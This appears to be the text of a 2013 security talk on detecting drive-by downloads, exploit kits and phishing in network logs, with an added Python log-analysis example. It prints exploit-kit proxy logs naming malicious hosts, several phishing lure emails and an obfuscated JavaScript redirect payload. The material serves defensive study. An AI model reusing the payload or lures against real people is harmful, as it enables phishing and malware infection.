DISSECTING RAW DATA: finding needles in the haystack
or the way to survive in the Dangerous Russian Environment
Fyodor Yarochkin Vladimir Kropotov Vitaly Chetvertakov May 2013, Moscow
About the speakers
Common interest: investigating unlawful activities for fun and profit ;-)
We can't spell. All mistakes are ours :)
All the pictures used in this prezo are (c) googled ;-)
Agenda
● Methodology of dealing with emerging threats
● Case studies
● Automation techniques and tools
● Q&A
Overview
● Understand threats
● Real time visibility
● You are owned. Your actions?
● Owned: finding who targets you, what data they want, what's been compromised
Prepare
Protect
Investigate
Detect
Getting ready :)
PREPARE
Initial network compromise: threats
● DbD attacks
● Email as attack vector
● Direct attacks against servers
Client-targeting attacks are on the rise
EASY! Bigger number of targets! Users' cumulative IQ < 0! ;-)
Drive-By in a Nutshell :)
● Visit an infected site (any banner network can be a lead too)
● Traffic distribution/TDS (not compulsory)
● Target identification (javascript exploit selection)
● Exploit
● Payload (.exe)
● Profit!
STILL BIG!!
DBD attacks
Before...
● Easy to collect samples
● Payload sent over the wire in plain
● Easy to automate analysis with sandbox
Now
● Payload is typically encoded (XOR) or encrypted
● Exploit triggered on user events
● Serve once per IP, blacklisting
APT! APT! APT! APT! APT! APT! APT! APT!
So, what is APT?
Someone wants YOUR stuff :-)
Drive by .. are you a target?
APT
● A single exploit
● Served to a limited range of IP addresses (sometimes)
● Payload behavior is very specific
Not APT
● Exploit packs
● Generic exploit packs (Redkit, Nitrino, famous Blackhole etc)
● Payloads vary
APT-related driveby example
● Does not include many exploits
● Is not using any off-the-shelf exploit pack
● Exploit code changes often
APT example cont..
● Binary pattern payload. VM sandbox detection
Call-back analysis
Bot vs Human
Exploit packs and kits
Bodyless Bot
GET;http://demonsstoryboard.pw/80F5;HTTP/1.1
95.211.7.3
200 57505 http://234x120.adv.vz.ru/cgi-bin/iframe/vz?1787&options=N
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://demonsstoryboard.pw/080F5wj;HTTP/1.1
95.211.7.3
200 20380 - Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/java-archive
GET;http://demonsstoryboard.pw/180F5wj;HTTP/1.1
95.211.7.3
200 135534 - Java/1.7.0_07 application/octet-stream
Exploit kits in your log
Cross-domain
GET;http://teware.info/crossdomain.xml;HTTP/1.1
62.109.7.187 200
391 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows)
text/xml
GET;http://teware.info/counter/hit/client_de5df061c99066d82cfc437f2b099455;HTTP/1.1
62.109.7.187 200
826 http://www.divetour.su/admin/lang/EN/logit.swf
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://isxops.info/ocycytyruwewufibegidutivabi;HTTP/1.1
82.146.56.201
200
27206 http://www.divetour.su/
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://tolizuhifa.ghmarspi.in.ua/izijyqyzoxym;HTTP/1.1
188.120.230.94
200
9926 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/3dr
GET;http://tolizuhifa.ghmarspi.in.ua/ebyhoducibe;HTTP/1.1
188.120.230.94
200
164332
Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/executable
GET;http://dapru.crackedsidewalks.com/viewforum.php?b=75c3d28;HTTP/1.1
37.9.52.21
200
949
http://verygoodcom.net/forum/viewtopic.php?f=31363995&t=45869451
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://dapru.crackedsidewalks.com/profile.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1
37.9.52.21
200
647
- Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/java-archive
GET;http://dapru.crackedsidewalks.com/y41gr.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1
37.9.52.21
403
295
- Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
-
Get 0wned quick!
Domain-rotation techniques
Domain rotation victims
● Over 500 compromised domains in 24 hours
● Domain rotation once per minute (3 minutes in the other incident)
TDS injections
GET;http://ctgwllr.changeip.name/googlestat.php;HTTP/1.1
37.10.104.72
200
640
http://www.english-shoes.ru/products/41/
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://ctgwllr.changeip.name/uqrojdt/2;HTTP/1.1 37.10.104.72
200
442
http://www.english-shoes.ru/products/41/
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html;HTTP/1.1
31.7.184.194
200
1578
3
http://ctgwllr.changeip.name/uqrojdt/2
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5;HTTP/1.1
31.7.184.194
200
466
http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/901212121255;HTTP/1.1
31.7.184.194
200
1001
http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5
Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)
text/html
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/text.jar;HTTP/1.1
31.7.184.194
200
8772
Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/x-jar
GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/0256000045/6799928;HTTP/1.1
31.7.184.194
200
8636
4
Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07
application/java-archive
Electronic Mail as attack vector
● Email is another common method for an adversary to put a foot into the target network.
● Attractiveness:
● Low profile (you only send emails to those who you want to compromise)
● Easy antivirus bypass (password-packed zip archives anyone? :)
● Users are generally – idiots ;-)
Email as attack vector.. are you a target?
APT?
● Single exploit
● Content of the mail is accurate to context
● Specific payload behavior (stats)
Non-targeted
● Mass-mailed
● Often no exploit used (.exe in attach)
APT through email.. An RTF document
(CVE-2012-0158 - "MSCOMCTL.OCX RCE Vulnerability")
● Payload writes a dll file
● Recent build date (2013)
● Autorun for persistence
● Calls back to C2 server group
● Suspicious user agents:
Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3)
Mozilla/4.0 (compatible; MSIE 5.0.2)
Mozilla/4.0 (compatible)
How to catch...
● Suspicious agents – works nicely (and easy to implement with Snort, Suricata, etc.)
● Time-series traffic analysis
Emerging Threats has a large number of APT related sigs. Take-and-modify :)
Owning a network..
● Vulnerabilities seen in use through this attack vector:
Adobe Acrobat Reader: CVE-2013-0640, CVE-2012-0775
Adobe Flash Player: CVE-2012-1535
MS Office: CVE-2012-0158, CVE-2011-1269, CVE-2010-3333, CVE-2009-3129
Java: CVE-2013-0422, CVE-2012-1723, CVE-2012-5076
But...
● Human stupidity is exploited more than ever..
Email with a password protected archive or a document
● Password protected archives bypass AV checks, firewall/WAF/.. detection
● No exploit. Executable file is masked as a document (icon, extension)
● Message content motivates the user to open the attachment (social engineering)
Good afternoon, According to the results of the audit, our firm turned out to have a debt to you for January in the amount of 9540 rubles. Our chief accountant has drawn up a reconciliation statement and asks you to sign this statement and send its scan. She also asks what is best to write when transferring the funds.
_______________________________________________________________________________
Sincerely, commercial director of OAO "M-TORG", Markina Olga Alekseevna
P.S. the reconciliation statement is attached to the letter, the password to the archive is 111
Let's look at some examples
Good afternoon, According to the results of the audit, our firm turned out to have a debt to you for December 2012 in the amount of 49540 rubles. Our chief accountant has drawn up a reconciliation statement and asks you to sign this statement and send its scan. She also asks what is best to write when transferring the funds.
_______________________________________________________________________________
Sincerely, accountant of ZAO "MSK", Kalinina Vera Vladimirovna
P.S. the reconciliation statement is attached to the letter, the password to the archive is 123
Examples (cont...)
Good afternoon, According to the results of the audit, our firm will transfer the debt to you for December 2012, in the sum of 49540 rubles. Our chief accountant makes an act of reconciliation and asked to sign the act and send its scan.
______________________________________________________________________________
Sincerely, Accountant of "MSK", Vera V. Kalinina
P.s. statement attached to the letter, the password for the archive 123
Unpacked file
.. and inside archive :)
Subject: British Airways E-ticket receipts
e-ticket receipt
Booking reference: 05V9363845
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services
British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number: 89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.
How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways. If you require further assistance you may contact us
If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
Another example
Another variation: email that contains masked links to malicious pages
• No attachment. The message is html/text pointing to the same resource
• All links are 'masked' to appear to point to legit links
• The same attractive text of the message
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113,115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,103,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];if(window.document)for(i=2-2;-i+104!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+j%zz);}xz=e;if(v)xz(s)}</script>
</body>
</html>
Encoded redirect..
Hot topic for big company, Cyprus Crisis
Diana Ayala saw this story on the BBC News website and thought you should see it.
** Cyprus bailout: bank levy passed parliament already! **
Cyprus can amend terms to a bailout deal that has sparked huge public anger....
< http://www.bbc.com.us/go/em/news/world-cyprus-57502820>
** BBC Daily E-mail **
Choose the news and sport headlines you want - when you want them, all in one daily e-mail
< http://www.bbc.co.uk/email>
** Disclaimer **
The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of the sender have been verified. If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a Friend service, please read our frequently asked questions by clicking here
This message is to notify you that your package has been processed and is on schedule for delivery from ADP. Here are the details of your delivery:
Package Type: QTR/YE Reporting
Courier: UPS Ground
Estimated Time of Arrival: Tusesday, 5:00pm
Tracking Number (if one is available for this package): 1Z023R961390411904
Details: Click here to view and/or modify order
We will notify you via email if the status of your delivery changes.
--------------------------------------------------------------------------------
Access these and other valuable tools at support.ADP.com:
o Payroll and Tax Calculators
o Order Payroll Supplies, Blank Checks, and more
o Submit requests online such as SUI Rate Changes, Schedule Changes, and more
o Download Product Documentation, Manuals, and Forms
o Download Software Patches and Updates
o Access Knowledge Solutions / Frequently Asked Questions
o Watch Animated Tours with Guided Input Instructions
Thank You,
ADP Client Services
support.ADP.com
--------------------------------------------------------------------------------
This message and any attachments are intended only for the use of the addressee and may contain information that is privileged and confidential. If the reader of the message is not the intended recipient or an authorized representative of the intended recipient, you are hereby notified that any dissemination of this communication is strictly prohibited. If you have received this communication in error, notify the sender immediately by return email and delete the message and any attachments from your system.
What happens if you click..
So once we have the basic knowledge, let's move on :)
DETECT
We will spend a bit more time discussing detection activities.
Because this is what we primarily do :)
So how do you detect attacks in your traffic..
What to look for..
• Search for randomly generated domains
• Search for 3rd level domains with dynamic dns prefixes (dyndns, dnsdojo, etc.)
• Search by known malware IPs
• Search by known constant parts in URLs and domain names
• Search by intermediate domains used in the attack
Common Counter-Detection Techniques
• Banner networks simulation
• DGA generated domains
• Compromised domains
• dyndns
• Time-based redirects (9 till 6pm Moscow time)
• Using non-standard ports
• Once per IP per day
• Blacklists (Yes! They blacklist us too)
Things to look for..
1) MIME type
• application/java-archive, application/x-jar, application/3dr for Java exploits
• application/pdf for Acrobat Reader exploits
• application/x-shockwave-flash for Adobe Flash Player exploits
2) User agent: Mozilla (Windows ...) with a Java/... version string
Example..
• Exploit code/malware components in Temp folder
• Activity of installer malware
• Detect bruteforce attacks against standard accounts: admin, guest
• Look for other suspicious IDS events: HTTP_Probe, SMB_Probes etc
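The indicators from the "What to look for" and "Things to look for" slides, applied to proxy-log lines as an added example (not a tool from the deck). The log records are constructed here in a one-line-per-request layout with the same fields as the slide excerpts; hostnames other than the changeip.name dynamic-DNS suffix are made up.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy-log records (not from the deck), one request per line,
# tab-separated: client IP, request line, status, bytes, referer, user agent,
# content type. The field set mirrors the log excerpts shown in the slides.
SAMPLE_LOG = """\
10.0.0.5\tGET http://www.shop.test/products/41/ HTTP/1.1\t200\t8120\t-\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)\ttext/html
10.0.0.5\tGET http://abcdefg.changeip.name/googlestat.php HTTP/1.1\t200\t640\thttp://www.shop.test/products/41/\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)\ttext/html
10.0.0.5\tGET http://qxcrr-xerox.kit.test/landing.html HTTP/1.1\t200\t1578\thttp://abcdefg.changeip.name/googlestat.php\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)\ttext/html
10.0.0.5\tGET http://qxcrr-xerox.kit.test/x/text.jar HTTP/1.1\t200\t8772\t-\tMozilla/4.0 (Windows 7 6.1) Java/1.7.0_07\tapplication/x-jar
10.0.0.5\tGET http://qxcrr-xerox.kit.test/x/0256000045/6799928 HTTP/1.1\t200\t135534\t-\tMozilla/4.0 (Windows 7 6.1) Java/1.7.0_07\tapplication/octet-stream
10.0.0.9\tGET http://downloads.example.test/update.jar HTTP/1.1\t200\t4000\t-\tJava/1.7.0_07\tapplication/java-archive
"""

# Content types the deck associates with exploit objects and with dropped payloads.
EXPLOIT_MIME = {"application/java-archive", "application/x-jar", "application/3dr",
                "application/pdf", "application/x-shockwave-flash"}
PAYLOAD_MIME = {"application/octet-stream", "application/executable"}
# Dynamic-DNS suffixes: changeip.name is seen in the deck's logs, the others are examples.
DYNDNS_SUFFIXES = ("changeip.name", "dyndns.org", "dnsdojo.com")


def parse(log_text):
    """Yield one dict per request line."""
    for line in log_text.splitlines():
        ip, req, status, size, ref, ua, ctype = line.split("\t")
        method, url, _proto = req.split(" ")
        yield {"ip": ip, "url": url, "host": urlsplit(url).hostname,
               "status": status, "ref": ref, "ua": ua, "ctype": ctype.lower()}


def is_dyndns(host):
    """True if host is a 3rd-level name under one of the dynamic-DNS suffixes."""
    return any(host.endswith("." + s) for s in DYNDNS_SUFFIXES)


def analyze(log_text):
    """Return (client ip, finding, url) triples in log order."""
    findings = []
    exploit_hosts = defaultdict(set)  # client -> hosts that already served an exploit object
    for r in parse(log_text):
        if is_dyndns(r["host"]):
            findings.append((r["ip"], "dyndns-host", r["url"]))
        java_ua = "Java/" in r["ua"]
        if java_ua and r["ctype"] in EXPLOIT_MIME:
            findings.append((r["ip"], "exploit-fetch", r["url"]))
            exploit_hosts[r["ip"]].add(r["host"])
        elif java_ua and r["ctype"] in PAYLOAD_MIME and r["host"] in exploit_hosts[r["ip"]]:
            # Strong signal: a binary pulled by the Java plugin from the same host
            # that just served the jar, i.e. exploit followed by payload.
            findings.append((r["ip"], "payload-after-exploit", r["url"]))
    return findings


if __name__ == "__main__":
    for ip, kind, url in analyze(SAMPLE_LOG):
        print(f"{ip:10} {kind:22} {url}")
```

A lone jar fetch (client 10.0.0.9) is only a weak "exploit-fetch" hit, since a legitimate applet looks the same; the jar-then-binary chain from one host is what distinguishes an exploit kit session.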
Other things to pay attention to...
Antivirus finds an exploit in the cache -> we were attacked -> antivirus saves us! ;-)
The exploit can be in the cache – AV finds it :)
AV logs – useful ;)
Antivirus detects malware modules
PROTECT
Approaches
Identify impact and isolate impacted machines
Exploit features of exploit kits to immunize your network
Attacker wants to serve once per IP...
● Automate visits to exploit pack serving points from your Client Honeybox/VM.
● Magic – exploit is not served to your users anymore.
Exploiting redundancy properties in the malware distribution and post-infection activity campaigns
INVESTIGATE
DNSLyzer
http://github.com/fygrave/dnslyzer/
Not only the payload is used for data transfer: the URL itself can be a covert channel
● GET hxxp://lionsholders.biz/st.php?os=windows%207&browser=msie&browserver=8.0& adobe%20reader=10.1&adobe%20flash=11.7.700.169&windows%20media%20player=12.0.7601.17514&java=0&silverlight=0
GET READY FOR AV TROLL!! :)
Strange things happen on the wire;)
Useful tools
● AOL Moloch https://github.com/aol/moloch
APT mail
● Xecure-lab APT document scanner
TIPS
Encrypted payload in non-targeted attacks
● If the full attack session was not collected (e.g. traffic dumps), don't waste the vendor's time
● Block all unrecognized/uncategorized content (default deny) or you get false negatives (FN) at all intermediate (transit) hosts
Be careful sharing/checking samples online, especially for targeted attacks
● Vendors share while attackers monitor changes
● FP ~ you shared some internal stuff (especially non-executable files, like office documents) with a third party = security policy violation
Monitoring VS Protection
● Strange, but true
Efficiency(Monitoring)~O(1/ Efficiency(Protection))
Incident Mitigation VS Investigation
● If your preparation is not enough
Efficiency(Mitigation)~ O(1/ Efficiency(Investigation))
● If you prepared, almost all steps of the investigation can be done asynchronously
Tracking activity of the organization in 3rd party networks
● Examples in the presentation relate to incidents in third-party networks and were reproduced in an environment adapted to what the attacker expects.
DISCLAIMER
Q & A